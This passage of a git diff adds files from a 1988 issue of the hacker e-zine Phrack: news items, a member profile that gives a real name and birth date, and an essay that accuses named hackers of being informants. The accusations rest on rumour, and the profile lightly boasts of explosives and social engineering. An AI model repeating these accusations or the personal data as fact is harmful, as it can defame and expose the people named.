+Callender also says "...the execution is less brilliant than the idea.  The
+book has the usual flashbacks, the usual stereotyped characters, the usual
+stiff dialogue."
+
+Although the reviewer doesn't say so, the premise of this novel is quite
+similar to a 1985 French thriller, published in the U.S. as 'Softwar.'  That
+novel was also based on the idea that a nation's arsenal could be completely
+disabled from a single point of sabotage, although in 'Softwar' it was the
+Soviet Union on the receiving end.  Popular reviewers of both books apparently
+find nothing implausible in the premise.
+_______________________________________________________________________________
+
+Hacker Enters U.S. Lab's Computers                            December 10, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+By Thomas H. Maugh II  (Los Angeles Times Service)
+
+A computer hacker has entered computers at the government's Lawrence Livermore
+Laboratory in the San Francisco Bay area eight times since last Saturday, but
+has not caused any damage and has not been able to enter computers that contain
+classified information, Livermore officials said Friday.  [Do they ever admit
+to anyone gaining access to classified data? -KL]
+
+Nuclear weapons and the Star Wars defense system are designed at Livermore, but
+information about those projects is kept in supercomputers that are physically
+and electronically separate from other computers at the laboratory.
+
+The hacker, whose identitiy remains unknown, entered the non-classified
+computer system at Livermore through Internet, a nationwide computer network
+that was shut down at the beginning of November by a computer virus.  Chuck
+Cole, Livermore's chief of security, said the two incidents apparently are
+unrelated.
+
+The hacker entered the computers through an operating system and then through a
+conventional telephone line, he gave himself "super-user" status, providing
+access to virtually all functions of the non-classified computer systems.
+
+Officials quickly limited the super-user access, although they left some
+computers vulnerable to entry in the hope of catching the intruder.
+
+"There has been no maliciousness so far," Cole said.  "He could have destroyed
+data, but he didn't.  He just looks through data files, operating records, and
+password files...It seems to be someone doing a joy-riding thing."
+_______________________________________________________________________________
+
+Shattering Revelations                                        December 11, 1988
+~~~~~~~~~~~~~~~~~~~~~~
+Taken from the RISKS Digest (Edited for this presentation)
+
+[Shatter is a hacker based in England, he is currently accused of breaking into
+computers at Massachusetts Institute of Technology.  -KL]
+
+(In this article, "IT" seems to refer to the computer community as a whole -KL)
+
+Some of you may have already heard of me via articles in the Wall Street
+Journal, New York Times, etc, but for those of you who do not have access to
+copies of these newspapers I am a hacker of over 10 years activity who is based
+near Nottingham, England [Rumored to be a false statement].  My specialities
+are the various packet switched networks around the world such as PSS, Telepac,
+Transpac, etc with various forays into UNIX, NOS/VE VMS, VM/SP, CMS, etc.
+
+I feel that as a hacker with so much activity and expirience I am qualified to
+make the following points on behalf of the whole hacking community.
+
+Hackers are not the vandals and common criminals you all think we are in fact
+most of the "TRUE" hackers around have a genuine respect and love for all forms
+of computers and the data that they contain.  We are as a community very
+responsible and dedicated to the whole idea of IT, but we also have a strong
+dislike to the abuse of IT that is perpetrated by various governments and
+organizations either directly or indirectly.  There is of course a small
+minority of so called hackers who do cause trouble and crash systems or steal
+money, but these people on the whole are dealt with by other hackers in a way
+that most of you could not even think of and most never repeat their "crimes"
+again.
+
+The term "HACKER" is still one to be very proud of and I am sure that in days
+past, anyone with a computer was called a hacker and they were very proud of
+the fact that someone felt that you had a great technical expertise that
+warrented the use of the term.  However, all of the accusers out there now
+suffer from the standard problem that nearly all people involved within IT have
+and that is non-communication.  You never pass on the information that you pick
+up and teach to others within IT [American Government organizations and
+Educational Institutes are among the greatest offenders] and this allows the
+hacking community [who do communicate] to be at least one step ahead of the
+system administrators when it comes to finding security problems and finding
+the cause and solution for the problem.
+
+A case in point is the recent Arpanet Worm and the FTP bug.  Both these
+problems have been known for many months if not years but, when talking to
+various system administrators recently, not one of them had been informed about
+them and this left their systems wide open even though they had done all they
+could to secure them with the information they had.
+
+An interesting piece of information is that hackers in England knew about
+Morris's Worm at least 12 hours before it became public knowledge and although
+England was not able to be infected due to the hardware in use, we were able to
+inform the relevent people and patrol Internet to Janet gateways to look for
+any occurance of the Worm and therefore we performed a valuble service to the
+computing community in England -- although we did not get any thanks or
+acknowledgement for this service.
+
+Hackers should be nurtured and helped to perform what they consider a hobby.
+Some people may do crosswords for intelectual challenge -- I study computers
+and learn about how things interact together to function correctly (or
+incorrectly as the case may be).  The use of a group of hackers can perform a
+valuable service and find problems that most of you could not even start to
+think of or would even have the inclination to look for.
+
+So please don't treat us like lepers and paupers.  Find yourself a "TAME"
+hacker and show him the respect he deserves.  He will perform a valuble service
+for you.  Above all COMMUNICATE with each other don't keep information to
+yourselves.
+
+Bst Rgrds
+Shatter
+_______________________________________________________________________________
+
+IBM Sells Rolm To Siemens AG                                  December 14, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+International Business Machines Corp. (IBM) announced on Tuesday that it was
+selling its Rolm telephone equipment subsidiary to West Germany's Siemens AG.
+
+Rolm has lost several hundred million dollars since IBM bought it in 1984 for
+$1.5 billion.  Rolm was the first, or one of the first companies to market
+digital PBX systems.
+
+As most telecom hobbyists already know, the PBX market has been very soft for
+years.  It has suffered from little or no growth and very bitter price
+competition.
+
+Siemens, a leading PBX supplier in Europe wants to bolster its sales in the
+United States, and believes it can do so by aquiring Rolm's sales and service
+operations.  Quite obviously, it will also gain access to some of the lucrative
+IBM customers in Europe.
+
+Rolm was an early leader in digital PBX's, but they were surpassed in 1984 by
+AT&T and Northern Telecom Ltd. of Canada.  Part of the strategy behind IBM's
+purchase of Rolm was IBM's belief that small personal computers would be linked
+through digital PBX's. Although this has happened, most businesses seem to
+prefer ethernet arrangements; something neither IBM or Rolm had given much
+thought to.  IBM was certain the late 1980's would see office computers
+everywhere hooked up through PBX's.
+
+IBM made a mistake, and at a recent press conference they admitted it and
+announced that Rolm was going bye-bye, as part of the corporate restructuring
+which has seen IBM divest itself of numerous non-computer related businesses in
+the past several months.  From its beginning until 1984, Rolm could not run
+itself very well; now IBM has washed its corporate hands.  Time will tell how
+much luck the Europeans have with it.
+
+                  Information Contributed by Patrick Townson
+_______________________________________________________________________________
+
+Virus Invades The Soviet Union                                December 19, 1988
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+>From The San Francisco Chronicle (P. A16)
+
+(UPI) - The Soviet Union announced on Decemeber 18, 1988 that that so-called
+computer viruses have invaded systems in at least five government-run
+institutions since August, but Soviet scientists say they have developed a way
+to detect known viruses and prevent serious damage.
+
+In August 1988, a virus infected 80 computers at the Soviet Academy of Sciences
+before it was brought under control 18 hours later.  It was traced to a group
+of Soviet and foreign schoolchildren attending the Institute's summer computer
+studies program, apparently resulting from the copying of game programs.
+
+Sergei Abramov of the Soviet Academy of Sciences claims they have developed a
+protective system, PC-shield, that protects Soviet computers against known
+virus strains.  It has been tested on IBM computers in the Soviet Union.  "This
+protective system has no counterpart in the world," he said (although the
+details remain a state secret).
+_______________________________________________________________________________
+
+Phrack World News Quicknotes                                         Issue XXII
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+1.  Rumor has it that the infamous John Draper aka Captain Crunch is currently
+    running loose on the UUCP network.  Recently, it has been said that he has
+    opened up some sort of information gateway to Russia, for reasons unknown.
+-------------------------------------------------------------------------------
+2.  Information Available For A Price
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+A company called Credit Checker and Nationwide SS says that anyone can;
+    o Take a lot of risk out of doing business.
+    o Check the credit of anyone, anywhere in the United States
+    o Pull Automobile Drivers License information from 49 states
+    o Trace people by their Social Security Number
+
+By "Using ANY computer with a modem!"
+
+To subscribe to this unique 24-hour on-line network call 1-800-255-6643.
+
+Can your next door neighbor really afford that new BMW ?
+-------------------------------------------------------------------------------
+3.  Reagan Signs Hearing-Aid Compatibility Bill
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+There is new legislation recently passed which requires all new phones to be
+compatible with hearing aids by next August.  The law requires a small device
+to be included in new phones to eliminate the loud squeal that wearers of
+hearing aids with telecoils pick up when using certain phones.  Importers are
+not exempted from the law.  Cellular phones and those manufactured for export
+are exempt.
+_______________________________________________________________________________
+=========================================================================
+
diff --git a/phrack22/2.txt b/phrack22/2.txt
new file mode 100644
index 0000000..0d14156
--- /dev/null
+++ b/phrack22/2.txt
@@ -0,0 +1,207 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 22, File 2 of 12
+
+                           ==Phrack Pro-Phile XXII==
+
+                             Created By Taran King
+
+               Brought To You By Taran King and Knight Lightning
+
+                            Done on October 8, 1988
+
+         Welcome to Phrack Pro-Phile XXII.  Phrack Pro-Phile was created to
+bring information to you, the community, about retired or highly important/
+controversial people.  This issue, we bring to you a name from the past and
+a user of highly respected rankings in the history of the phreak/hack world...
+
+                                   Karl Marx
+                                   ~~~~~~~~~
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Personal
+~~~~~~~~
+           Handle:  Karl Marx
+         Call Him:  James Salsman
+     Past Handles:  None
+    Handle Origin:  Bloom County (Something about Capitalists and Humor)
+    Date Of Birth:  12/2/67
+           Height:  6"0'
+           Weight:  155 lbs
+        Eye Color:  Blue
+       Hair Color:  Dark Brown
+        Shoe Size:  10 1/2
+        Computers:  Nondeterministic turing machines
+Sysop/Co-Sysop Of:  Farmers of Doom
+
+Origins In Phreak/Hack World:
+    Manufacturing Explosives -- He wanted to blow up his High School.
+
+Origins In Phreak/Hack BBSes:  Plovernet!
+
+People In The Phreak/Hack World Met:
+
+    The Buccaneer, Mark Tabas, Shadow Master, and a few other Colorado types.
+    He also actually made it to a TAP meeting a while ago [TelePub '86], but he
+    slept through it.  All he remembers is that it was in New York and Scan Man
+    was there in a baseball cap.  He thinks it was in a "Days Inn" or
+    something.
+
+
+Experience Gained In The Following Ways:
+
+    Spending long hours pouring over Bell System Tech Journals from
+    1970-Present.  He suggests to anyone who wants to learn non-trivial, but
+    useful things -- or who just wants to get some really *powerful*
+    vocabulary for social engineering -- try using your local college or large
+    public library.
+
+
+Knowledge Attributed To:
+
+    Nearly everyone who he's ever talked to -- if you let people bullshit you
+    long enough, you learn quite a bit just by figuring out why they are wrong.
+
+
+Memorable Phreak/Hack BBSes:  Plovernet, Legion of Doom, Shadowland, and of
+                              course the invisible 3rd level of FOD.
+
+
+Work/Schooling (Major):
+
+    Carnegie Mellon University.  He dropped out as soon as they let him work on
+    interesting Cognitive Science and AI projects.  He currently works at
+    Expert Technologies -- the company has an expert system for putting
+    together various Yellow Pages for client phone companies that he is not
+    supposed to name (there's no point in naming them, 'cause by now they do
+    every fucking Yellow Pages in the country -- ACK!)  But that's just what
+    makes the company money.  He's working on user interfaces based on speech
+    recogniton.
+
+
+Conventions/Involvements Outside Of Phone Calls:
+
+    He thinks he went to that TAP [Telepub '86] meeting, but he doesn't
+    remember much more than Scan Man's cap.  He was INTENSELY tired and his
+    girlfreind was complaining that everyone was a geek and that they had to
+    find a way to get back in Pittsburgh in four hours.
+
+
+Accomplishments:
+
+    He wrote somthing about Nitroglycerin.  He probably killed a lot of
+    aspiring phreaks on Plovernet by not putting in enough warnings like
+    "Remember, DON'T make more than a few grams or you will be found dead and
+    identified as Dinty Morre Beef Stew."  He also came up with the "RESCOC --
+    Remote Satellite Course Correction System" file.  It was PURE bullshit, but
+    with headings like "How to manuver a satelite to crash it into cities (like
+    Moscow)" it was a big hit with the "Hacker-Hype" media.  AT&T denied
+    everything.
+
+
+Phreak/Hack Groups:  He got a lot of mail saying somthing like;
+
+    "Congratulations! You MAY ALREADY HAVE WON membership into the NEW GROUP...
+
+                       ----- THE CAPTAINS OF CODES -----
+
+    It's the best new phreak/hack group since MIT!  Just tell us everything you
+    know and tell everyone else what a great group we are -- AND WE WILL LET
+    YOU BE A MEMBER OF... ----- THE CAPTAINS OF CODES -----"
+    He usually ignored these "memberships."  He believes Tabas understood the
+    problem when he created the parody-group "Farmers of Doom."
+
+
+Interests:
+
+    His main interest is AI.  His particular application domains focus on
+    Cognitive Science and Pattern recognition.  He thinks he might have been
+    interested in the telephone system -- but those days are over.  He doesn't
+    even remember the codes to do trunk selection on an RTA distribution point.
+    And if the ROCs security folks think he still does that sort of thing they
+    are going to have to prove it.  :-)
+
+
+Favorite Things;
+
+    Thinking:      Problem Solving
+    Conversation:  Exchange of information
+    Love:          Emotional fulfillment
+    Sex:           Physical fulfillment
+    Drugs:         Introspection
+    Poetry:        Metaphor, Imagery
+    Involvement:   Sense of Self-Worth
+    Music:         Rhythm, Harmonics
+    Food:          Flavor, Satisfaction
+    Breathing:     Inhalation of Oxygen
+
+
+Most Memorable Experience:
+
+    The funniest thing that ever happened to him was the time he was arrested.
+    The Secret Service had bugged this hotel room and surprised them (always
+    remember, SECRET service and ROOM service are not *that* different.)  They
+    took them to a Denver Police holding tank that was filled with non-sober
+    hooligans.
+
+    Unfortunately, he was in a business suit (having just returned from handing
+    a $5,000,000.00 "certified" check to Charles Schwab in Sacramento).  So
+    there were all these drunk people asking me, "Ahre yha my lawer???"
+
+    Of course, Mark Tabas had it easy in his Hawaiian print shirt, but he had
+    to deal with "Whatcha here fur?"  Jim told them that he was being held for
+    "Fraud."  That explanation didn't seem to satisfy them -- "Har, har, har!
+    Fraud!  The kid's in here for fraud!  Let me tell you what I'm in for!
+    What do you think I'm here for??"
+
+    He didn't have the heart to tell the gentlemen that he really didn't care
+    why they shared such a predicament so he responded with a blank stare.
+    They then went on to describe crimes so horrible that he could hardly
+    believe them, if it wasn't for the fact that most of them were at least two
+    thirds covered in blood.  That sort of gave them the advantage, so he went
+    on to tell them that he must have been put in the wrong cell and that he
+    was sure that the jailer would transfer him in just a few hours.  They all
+    seemed to accept that, and went on to insulting each other.
+
+
+Some People To Mention:
+
+o   "I'd like to thank Who-Bob and T-Bob for their long hours they spent
+    discussing new and innovative ESS social engineering techniques.
+
+o   I am forever indebted to Mark Tabas for his courage and demeanor in the
+    face of adversity -- which is to say that getting busted didn't bother him
+    as much as disk space problems did.
+
+o   There's this guy named "Chuck" in the 303 T5 center who I'd like to mention
+    because he set up a RTA routing code for me that switched incoming toll
+    trunks to BLV trunks -- if only everyone were that stupid!"
+
+
+Inside Jokes:  "Sorry, sir, we were just trying to find some wire for our
+               science fair project, but as there appears to be nothing here
+               but coffee grounds and cigarette ashes, we had better get going.
+               Have a nice day!"
+
+
+Serious Section:  He's very strongly against geting busted.
+
+
+Are Phreaks/Hackers You've Met Generally Computer Geeks?
+
+    He hopes not!  Most of the people that used to be computer geeks around CMU
+    now wear suits and ties and have six digit salaries.  What a horrible
+    thing!  He wouldn't wish that on his worst enemy!
+
+
+Busted For:  He was busted for being in a hotel room with Steve Dahl.  He was
+             convicted of the law that says, in effect "it's illegal to lie to
+             somebody more powerful than you."  He stopped phreaking because he
+             was on probation and didn't want to go to prison.  He is NOT
+             planning a comeback.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Thanks for your time James.
+
+                        Taran King and Knight Lightning
+_______________________________________________________________________________
diff --git a/phrack22/3.txt b/phrack22/3.txt
new file mode 100644
index 0000000..e0d083e
--- /dev/null
+++ b/phrack22/3.txt
@@ -0,0 +1,441 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 22, File 3 of 12
+
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+       <>                                                            <>
+       <>                     The Judas Contract                     <>
+       <>                     ~~~~~~~~~~~~~~~~~~                     <>
+       <>           Part Two Of The Vicious Circle Trilogy           <>
+       <>                                                            <>
+       <>           An Exploration of The Quisling Syndrome          <>
+       <>                             and                            <>
+       <>  A Look At The Insurrection Of Security Into The Community <>
+       <>                                                            <>
+       <>                Presented by Knight Lightning               <>
+       <>                       August 7, 1988                       <>
+       <>                                                            <>
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+
+The Quisling Syndrome
+~~~~~~~~~~~~~~~~~~~~~
+Definition:  Quisling - (Kwiz/lin)  (1) n. Vidkun Quisling (1887 - 1945),
+                                           Norwegian politician who betrayed
+                                           his country to the Nazis and became
+                                           its puppet ruler.
+
+                                    (2) n. A traitor.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+The "Quisling" Syndrome is rapidly becoming a common occurrence in the less
+than legal realms of the modem community.  In general it starts out with a
+phreaker or hacker that is either very foolish or inexperienced.  He somehow
+manages to get caught or busted for something and is scared beyond belief about
+the consequences of his actions.  At this point, the law enforcement agency(s)
+realize that this one bust alone is worthless, especially since the person
+busted is probably someone who does not know much to begin with and would be a
+much better asset if he could assist them in grabbing other more experienced
+and dangerous hackers and phreaks.  In exchange for these services the Judas
+will have his charges dropped or reduced and considering the more than likely
+parential pressure these Judases will receive, the contract will be fulfilled.
+
+Example; Taken from Phrack World News Issue XV;
+
+           [This exceprt has been edited for this presentation. -KL]
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Mad Hatter; Informant?                                            July 31, 1987
+~~~~~~~~~~~~~~~~~~~~~~
+We at Phrack Inc. have uncovered a significant amount of information that has
+led us to the belief that Mad Hatter is an informant for some law enforcement
+organization.
+
+MH had also brought down several disks for the purpose of copying Phantasie
+Realm.  Please note; PR was an IBM program and MH has an apple.
+
+Control C told us that when he went to pick MH up at the bus terminal, he
+watched the bus pull in and saw everyone who disembarked.  Suddenly Mad Hatter
+was there, but not from the bus he was supposed to have come in on.  In
+addition to this, he had baking soda wraped in a five dollar bill that he tried
+to pass off as cocaine.  Perhaps to make us think he was cool or something.
+
+MH constantly tried to get left behind at ^C's apartment for unknown reasons.
+He also was seen at a neighbor's apartment making unauthorized calls into the
+city of Chicago.  When asked who he called, his reply was "Don't worry about
+it."  MH had absolutely no money with him during PartyCon (and incidentally ate
+everything in ^C's refrigerator) and yet he insisted that although he had taken
+the bus down and had return trip tickets for the bus, that he would fly back
+home.  How was this going to be achieved?  He had no money and even if he could
+get a refund for the bus tickets, he would still be over $200 short.  When
+asked how he was going to do this, his reply was "Don't worry about it."
+
+On Saturday night while on the way to the Hard Rock Cafe, Mad Hatter asked
+Control C for the location of his computer system and other items 4 times.
+This is information that Hatter did not need to know, but perhaps a SS agent or
+someone could use very nicely.
+
+When Phrack Inc. discovered that Dan The Operator was an FBI informant and made
+the news public, several people were criticizing him on Free World II Private.
+Mad Hatter on the other hand, stood up for Noah and said that he was still his
+friend despite what had happened.  Then later when he realized that people were
+questioning his legitimacy, his original posts were deleted and he started
+saying how much he wanted to kill Dan The Operator and that he hated him.
+
+Mad Hatter already has admitted to knowing that Dan The Operator was an FBI
+informant prior to SummerCon '87.  He says the reason he didn't tell anyone is
+because he assumed we already knew.
+
+A few things to add;
+
+^*^  Some time ago, Mad Hatter was contacted by AT&T because of an illegal
+     Alliance Teleconference that he was responsible for.  There was no bust.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Could this AT&T investigation have been the starting point for Mad Hatter's
+treason against the phreak/hack community?  Is there more to it than that?
+We may never know the full truth behind this, however we do know that Mad
+Hatter was not the only one to know Dan The Operator's secret prior to
+SummerCon '87.  The Executioner (who had close ties to TMC Security employees
+in Omaha, Nebraska) was fully aware of Dan The Operator's motives and
+intentions in the modem world.
+
+There does not always have to be a bust involved for a phreak/hacker to turn
+Judas, sometimes fear and panic can be a more powerful motivator to become a
+Quisling.
+
+Example; Taken From Phrack World News Issue XV;
+
+           [This exceprt has been edited for this presentation. -KL]
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Crisis On Infinite Hackers                                        July 27, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+It all started on Tuesday, July 21, 1987.  Among 30-40 others, Bill From RNOC,
+Eric NYC, Solid State, Oryan QUEST, Mark Gerardo, The Rebel, and Delta-Master
+have been busted by the United States Secret Service.  There are rumored to be
+several more members of the more "elite" community busted as well, but since we
+can neither disprove or prove the validity of these rumors, I have chosen not
+to name them at this time.
+
+One of the offshoots of this investigation is the end of The Lost City of
+Atlantis and The Lineman's treason against the community he once helped to
+bring about.  In Pennsylvainia, 9 people were busted for credit card fraud.
+When asked where they learned how to perform the art in which they had been
+caught, they all responded with the reply of text files from The Lost City Of
+Atlantis.
+
+So, the Secret Service decided to give The Lineman a visit.  Lineman, age 16 (a
+minor) had no charges against him, but he panicked anyway and turned over the
+bulletin board, all g-philes, and the complete userlog to the Secret Service.
+This included information from the "Club Board."  The final outcome of this
+action is still on its way.  In the meantime, many hackers are preparing for
+the worst.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+The results and consequences from The Lineman's actions were far more severe
+than they originally appeared.  It is highly speculated that The Lineman was in
+possesion on a very large directory of phreaks/hackers/pirates that he had
+recently acquired.  That list is now in the hands of the government and the
+Communications Fraud Control Association (as well as in the files of all of the
+individual security departments of CFCA members).  I've seen it and more.
+
+The Lineman was able to acquire this list because one phreak stole it from
+another and then began to trade it to his friends and to others for information
+and passwords, etc. and what happened from there is such an over exposure and
+lack of CONTROL that it fell into the wrong and dangerous hands.  Acts such as
+this will with out a doubt eventually lead all of us towards entropy.
+
+Captain Caveman, also known as Shawn of Phreakers Quest, began work to help TMC
+after he was set up by Scan Man during the summer of 1986.
+
+However, being busted or feeling panic are still not the only motivations for
+becoming a Judas.  John Maxfield, one of today's best known security
+consultants, was once a hacker under the handle(s) of Cable Pair and Uncle Tom.
+He was a member of the Detroit based Corrupt Computing and the original Inner
+Circle until he was contacted by the FBI and decided that it would be more fun
+to bust hackers than be one.
+
+The following is an excerpt from Phrack World News Issue V;
+
+           [This article has been edited for this presentation. -KL]
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Computer Kids, Or Criminals?
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+John Maxfield is a computer security consultant who lives in a downriver
+suburb.  Maxfield spends most of his working hours scanning BBSs, and is known
+by computer crime experts as a hacker tracker.  His investigative work scanning
+boards has resulted in more prosecutions of computer hackers than anyone else
+in the field, say sources familiar with his work.  Maxfield, who accepts death
+threats and other scare tactics as part of the job, says the trick is knowing
+the enemy.  Next to his monstrous, homemade computer system, Maxfield boasts
+the only file on computer hackers that exists.  [Not true any longer -KL]  It
+contains several thousand aliases used by hackers, many followed by their real
+names and home phone numbers.  All of it is the result of four years of steady
+hacker-tracking, says Maxfield. "I've achieved what most hackers would dearly
+love to achieve," said Maxfield.  "Hacking the hacker is the ultimate hack."
+
+Maxfield estimates there are currently 50,000 hackers operating in the computer
+underground and close to 1,000 underground bulletin boards.  Of these, he
+estimates about 200 bulletin boards are "nasty," posting credit card numbers,
+phone numbers of Fortune 500 corporations, regional phone companies, banks, and
+even authored tutorials on how to make bombs and explosives.  One growing camp
+of serious hackers is college students, who typically started hacking at 14 and
+are now into drug trafficking, mainly LSD and cocaine, said Maxfield.
+
+Maxfield's operation is called BoardScan.  He is paid by major corporations and
+institutions to gather and provide them with pertinent intelligence about the
+computer underground.  Maxfield also relies on reformed hackers.  Letters of
+thanks from VISA and McDonald's decorate a wall in his office along with an
+autographed photo of Scottie, the engineer on Star Trek's Starship Enterprise.
+
+Often he contacts potential clients about business.  "More often I call them
+and say, I've detected a hacker in your system," said Maxfield.  "At that
+point, they're firmly entrenched.  Once the hackers get into your computer,
+you're in trouble.  It's analogous to having roaches or mice in the walls of
+your house.  They don't make their presence known at first.  But one day you
+open the refrigerator door and a handful of roaches drop out."
+
+Prior to tracking hackers, Maxfield worked for 20-odd years in the hardware end
+of the business, installing and repairing computers and phone systems.  When
+the FBI recruited him a few years back to work undercover as a hacker and phone
+phreak, Maxfield concluded fighting hacker crime must be his mission in life.
+
+"So I became the hacker I was always afraid I would become," he said.  Maxfield
+believes the hacker problem is growing more serious.  He estimates there were
+just 400 to 500 hackers in 1982.  Every two years, he says, the numbers
+increase by a factor of 10.  Another worrisome trend to emerge recently is the
+presence of adult computer hackers.  Some adults in the computer underground
+pose as Fagans, a character from a Charles Dickens novel who ran a crime ring
+of young boys, luring young hackers to their underground crime rings.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+John Freeman Maxfield's BoardScan is also known as the Semco Computer Club and
+Universial Export, the latter coming from the company name used by the British
+government in Ian Flemming's James Bond novels and subsequent motion pictures.
+
+Another Judas hacker who went on to become a security consultant is the
+infamous Ian Arthur Murphy of I.A.M. Security.  Perhaps he is better known as
+Captain Zap.
+
+The following excerpt is from The Wall Street Journal;
+
+[This article has been edited for this presentation. -KL]
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+It Takes A Hacker To Catch A Hacker As Well As A Thief         November 3, 1987
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Dennis Kneale (Staff Reporter Of The Wall Street Journal)
+
+              "Computer Hacker Ian [Arthur] Murphy Prowls A Night
+               Beat Tracking Down Other Hackers Who Pirate Data"
+
+     Capt. Zap actually Ian A. Murphy, is well-known as one of the first
+convicted computer-hacker thieves.  He has since reformed -- he swears it --
+and has been resurrected as a consultant, working the other side of the law.
+
+CRIME CREDENTIALS
+     Other consultants, many of them graying military vets, try to flush out
+illicit hackers.  But few boast the distinction of being a real hacker -- and
+one with a felony among his credentials.  Capt. Zap is more comfortable at the
+screen than in a conversation.  Asked to name his closest friend, he shakes his
+head and throws up his hands.  He has none.  "I don't like people," he says.
+"They're dreadful."
+     "He's legendary in the hacking world and has access to what's going on.
+That's a very valuable commodity to us," says Robert P. Campbell of Advanced
+Information Management in Woodbridge, Va., Mr. Murphy's mentor, who has hired
+him for consulting jobs.  The 30-year-old Mr. Murphy is well-connected into his
+nocturnal netherworld.  Every night till 4 a.m., he walks a beat through some
+of the hundreds of electronic bulletin boards where hackers swap tales and
+techniques of computer break-ins.
+     It is very busy these nights.  On the Stonehenge bulletin board, "The
+Marauder" has put up a phone number for Citibank's checking and credit-card
+records, advising, "Give it a call."  On another board, Mr. Murphy finds a
+primer for rookie "hacklings," written by "The Knights Of Shadow."  On yet
+another he sifts out network codes for the Defense Department's research
+agency.
+     He watches the boards for clients and warns when a system is under attack.
+For a fee of $800 a day and up, his firm, IAM/Secure Data Systems Inc., will
+test the security of a data base by trying to break in, investigate how the
+security was breached, eavesdrop on anyone you want, and do anything else that
+strikes his fancy as nerd vs. spy.  He says his clients have included Monsanto
+Co., United Airlines, General Foods Corp., and Peat Marwick.  Some probably
+don't know he worked for them.  His felony rap -- not to mention his caustic
+style -- forces him to work often under a more established consultant.  "Ian
+hasn't grown up yet, but he's technically a brilliant kid," says Lindsey L.
+Baird, an Army veteran whose firm, Info-Systems Safeguards in Morristown, New
+Jersey has hired Capt. Zap.
+     Mr. Murphy's electronic voyeurism started early,  At age 14, he would
+sneak into the backyard to tap into the phone switch box and listen to
+neighbor's calls.  (He still eavesdrops now and then.)  He quit highschool at
+age 17.  By 19 he was impersonating a student and sneaking into the computer
+center Temple University to play computer games.
+
+EASY TRANSITION
+     From there it was an easy transition to Capt. Zap's role of breaking in
+and peeking at academic records, credit ratings, a Pentagon list of the sites
+of missiles aimed at the U.S., and other verboten verbiage.  He even left his
+resume inside Bell of Pennsylvania's computer, asking for a job.
+     The electronic tinkering got him into trouble in 1981.  Federal agents
+swarmed around his parent's home in the wealthy suburb of Gladwyne, Pa.  They
+seized a computer and left an arrest warrant.  Capt. Zap was in a ring of eight
+hackers who ran up $212,000 in long-distance calls by using a "blue box" that
+mimics phone-company gear.  They also ordered $200,000 in hardware by charging
+it to stolen credit-card numbers and using false mail drops and bogus purchase
+orders.  Mr. Murphy was the leader because "I had the most contempt" for
+authority, he says.
+     In 1982, he pleaded guilty to receiving stolen goods and was sentenced to
+1,000 hours of community service and 2 1/2 years of probation.  "It wasn't
+illegal.  It was electronically unethical," he says, unrepentant.  "Do you know
+who likes the phone company?"  Who would have a problem with ripping them off?"
+     Mr. Murphy, who had installed commercial air conditioning in an earlier
+job, was unable to find work after his arrest and conviction.  So the hacker
+became a hack.  One day in his cab he picked up a Dun & Bradstreet Corp.
+manager while he was carrying a printout of hacker instructions for tapping
+Dun's systems.  Thus, he solicited his first consulting assignment:  "I think
+you need to talk to me."  He got the job.
+     As a consultant, Mr. Murphy gets to do, legally, the shenanigans that got
+him into trouble in the first place.  "When I was a kid, hacking was fun.  Now
+I can make money at it and still have a lot of fun."
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Now because of all the publicity surrounding our well known friends like Ian
+Murphy or John Maxfield, some so-called hackers have decided to cash in on news
+coverage themselves.
+
+Perhaps the most well known personality that "sold out" is Bill Landreth aka
+The Cracker, who is the author of "Out Of The Inner Circle," published by
+Microsoft Press.  The book was definitely more fiction than fact as it tried to
+make everyone believe that not only did The Cracker form the Inner Circle, but
+that it was the first group ever created.  However, for starters, The Cracker
+was a second-rate member of Inner Circle II.  The publicity from the book may
+have served to bring him some dollars, but it ultimately focused more negative
+attention on the community adding to an already intense situation.  The
+Cracker's final story had a little sadder ending...
+
+Taken from Phrack World News Issue X;
+
+[This article has been edited for this presentation. -KL]
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+The Cracker Cracks Up?                                        December 21, 1986
+~~~~~~~~~~~~~~~~~~~~~~
+         "Computer 'Cracker' Is Missing -- Is He Dead Or Is He Alive"
+
+ESCONDIDO, Calif. -- Early one morning in late September, computer hacker Bill
+Landreth pushed himself away from his IBM-PC computer -- its screen glowing
+with an uncompleted sentence -- and walked out the front door of a friend's
+home here.
+
+He has not been seen or heard from since.
+
+The authorities want him because he is the "Cracker", convicted in 1984 of
+breaking into some of the most secure computer systems in the United States,
+including GTE Telemail's electronic mail network, where he peeped at NASA
+Department of Defense computer correspondence.
+
+His literary agent wants him because he is Bill Landreth the author, who
+already has cashed in on the successful publication of one book on computer
+hacking and who is overdue with the manuscript of a second computer book.
+
+The Institute of Internal Auditors wants him because he is Bill Landreth the
